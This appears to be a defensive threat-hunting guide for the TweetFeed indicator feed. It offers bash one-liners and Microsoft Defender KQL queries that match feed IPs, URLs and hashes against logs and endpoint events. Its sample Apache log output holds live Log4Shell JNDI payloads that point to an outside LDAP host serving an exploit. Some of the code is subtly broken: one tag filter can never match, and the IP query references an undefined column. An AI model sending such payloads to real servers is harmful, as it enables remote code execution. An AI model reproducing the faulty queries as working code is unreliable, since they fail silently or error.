Hunt
Hunt IOCs in different environments
- Bash commands
- Microsoft Defender for Endpoint (MDE)
Bash commands
Some bash commands to get IOCs directly from Tweets.
1. Get raw IOCs by type (url / domain / ip / sha256 / md5)
Command:
curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 > {Output File}
Command example - getting suspicious URLs from today:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "url"' | cut -d, -f4 > suspicious_urls.dat
Output example:
url1
url1
url3
url4
...
2. Get raw IOCs by tag (phishing / malware / CobaltStrike / Log4Shell / ...)
Command:
curl -s {CSV feed} | awk -F, 'tolower($5) ~ "{tag}"' | cut -d, -f4 > {Output File}
Command example - getting all IOCs related to CobaltStrike from today:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, 'tolower($5) ~ "CobaltStrike"' | cut -d, -f4 > iocs_CS.dat
Output example:
url
md5
ip
ip
ip
url
domain
md5
sha256
...
3. Search IOCs in a file (e.g. log files)
Command:
curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 | while read line; do grep "$line" {File};done
Command example - searching IPs related to #Log4Shell vulnerability on Apache logs:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "ip" && $5 ~ "log4"' | cut -d, -f4 | while read line; do grep "$line" /var/log/apache2/access.log;done
Output example:
170.210.45.163 - - [16/Dec/2021:21:13:00 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 589 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:21:13:01 +0000] "GET / HTTP/1.1" 301 509 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
170.210.45.163 - - [17/Dec/2021:01:48:06 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 5228 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [17/Dec/2021:01:48:07 +0000] "GET / HTTP/1.1" 301 5228 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
Microsoft Defender for Endpoint (MDE) More info
Just examples, modify them as you wish.
let MaxAge = ago(30d);
let domain_whitelist = pack_array(
'XXX' // Some URL/Domain you want to whitelist.
);
let TweetFeed = materialize (
(externaldata(report:string)
[@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
with (format = "txt"))
| extend report = parse_csv(report)
| extend Type = tostring(report[2])
| where Type in('url','domain')
| extend RemoteUrl = tostring(report[3])
| where RemoteUrl !in(domain_whitelist)
| extend Tag = tostring(report[4])
| extend Tweet = tostring(report[5])
| project RemoteUrl, Tag, Tweet
);
union (
TweetFeed
| join (
DeviceNetworkEvents
| where Timestamp > MaxAge
) on RemoteUrl
) | project Timestamp, DeviceName, RemoteUrl, Tag, Tweet
let MaxAge = ago(30d);
let IPaddress_whitelist = pack_array(
'XXX' // Some IP address you want to whitelist.
);
let TweetFeed = materialize (
(externaldata(report:string)
[@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
with (format = "txt"))
| extend report = parse_csv(report)
| extend Type = tostring(report[2])
| where Type == 'ip'
| extend RemoteIP = tostring(report[3])
| where RemoteIP !in(IPaddress_whitelist)
| where not(ipv4_is_private(TweetFeedIP))
| extend Tag = tostring(report[4])
| extend Tweet = tostring(report[5])
| project RemoteIP, Tag, Tweet
);
union (
TweetFeed
| join (
DeviceNetworkEvents
| where Timestamp > MaxAge
) on RemoteIP
) | project Timestamp, DeviceName, RemoteIP, Tag, Tweet
let MaxAge = ago(30d);
let SHA256_whitelist = pack_array(
'XXX' // Some SHA256 hash to whitelist.
);
let TweetFeed = materialize (
(externaldata(report:string)
[@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
with (format = "txt"))
| extend report = parse_csv(report)
| extend Type = tostring(report[2])
| where Type == 'sha256'
| extend SHA256 = tostring(report[3])
| where SHA256 !in(SHA256_whitelist)
| extend Tag = tostring(report[4])
| extend Tweet = tostring(report[5])
| project SHA256, Tag, Tweet
);
union (
TweetFeed
| join (
DeviceProcessEvents
| where Timestamp > MaxAge
) on SHA256
), (
TweetFeed
| join (
DeviceFileEvents
| where Timestamp > MaxAge
) on SHA256
), (
TweetFeed
| join (
DeviceImageLoadEvents
| where Timestamp > MaxAge
) on SHA256
) | project Timestamp, DeviceName, FileName, FolderPath, SHA256, Tag, Tweet
let MaxAge = ago(30d);
let MD5_whitelist = pack_array(
'XXX' // Some MD5 hash to whitelist.
);
let TweetFeed = materialize (
(externaldata(report:string)
[@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
with (format = "txt"))
| extend report = parse_csv(report)
| extend Type = tostring(report[2])
| where Type == 'md5'
| extend MD5 = tostring(report[3])
| where MD5 !in(MD5_whitelist)
| extend Tag = tostring(report[4])
| extend Tweet = tostring(report[5])
| project MD5, Tag, Tweet
);
union (
TweetFeed
| join (
DeviceProcessEvents
| where Timestamp > MaxAge
) on MD5
), (
TweetFeed
| join (
DeviceFileEvents
| where Timestamp > MaxAge
) on MD5
), (
TweetFeed
| join (
DeviceImageLoadEvents
| where Timestamp > MaxAge
) on MD5
) | project Timestamp, DeviceName, FileName, FolderPath, MD5, Tag, Tweet